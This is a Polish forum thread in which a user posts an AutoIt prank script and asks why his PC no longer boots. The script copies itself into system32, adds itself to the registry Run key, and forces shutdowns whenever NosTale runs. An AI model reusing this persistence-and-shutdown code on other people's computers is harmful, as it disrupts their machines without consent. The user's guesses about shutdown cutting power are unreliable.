Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Rekomendowane odpowiedzi

Opublikowano

Witam, pisałem sobie różne proste skrypty i postanowilem napisać skrypt blokujący Nostale oraz strone www.nostale.pl otwierana w mozilli i w internet explorer.

Program dodałem do autostartu, zeby bratu zrobic psikusa. Troche nie wyszło bo teraz komputera nie da sie wlaczyc, nawet do biosu nie da sie wejsc.. Break dałem zeby brat wiedzial ze "wirus" działa ale zeby nie mogl zamknac (piracka wersja, nie da sie wlaczyc menadzera zadan)

Oto kod skryptu:

break(0)

FileCopy(@ScriptFullPath, "C:\Windows\system32\ss.exe", 1)

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN","Filesys","REG_SZ", "C:\Windows\system32\ss.exe")

While 1

If WinExists("Zagraj teraz w NosTale za darmo! - Mozilla Firefox") or WinExists("Zagraj teraz w NosTale za darmo! - Windows Internet Explorer") Then

Shutdown(5)

EndIf

If ProcessExists("nostalex.dat") Then

Shutdown(2)

EndIf

WEnd

Co możecie poradzic? Resetowałem już parę razy komputer, ale nadal nic się nie dzieje po uruchomieniu ponownym tylko czarny ekran. Dodam że windows spiracony (w prawym dolnym rogu pisało Twoj system jest prawdopodobnie kopia. Skonsultuj sie ze sprzedawca czy cos w tym stylu. Czy shutdown(5) moze dzialac inaczej niz jako wylaczenie komputera z uzyciem sily? Moze odlaczyc zasilanie? bo wiem ze taka opcja istnieje. Jak tak to w jaki sposób ponownie je włączyć??

Edit: lub shutdown(2) moze jakos odlaczac zasilanie a nie restartowac komputer?

1517585546.png

Daj + za internet :D

Opublikowano

Tylko że akurat wszystko zdażyło sie po właczeniu nostale. Wyłączył sie komputer i juz nie dziala...

Jeśli nie program to co mogło sie zepsuc?

1517585546.png

Daj + za internet :D

Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Dodaj nową pozycję...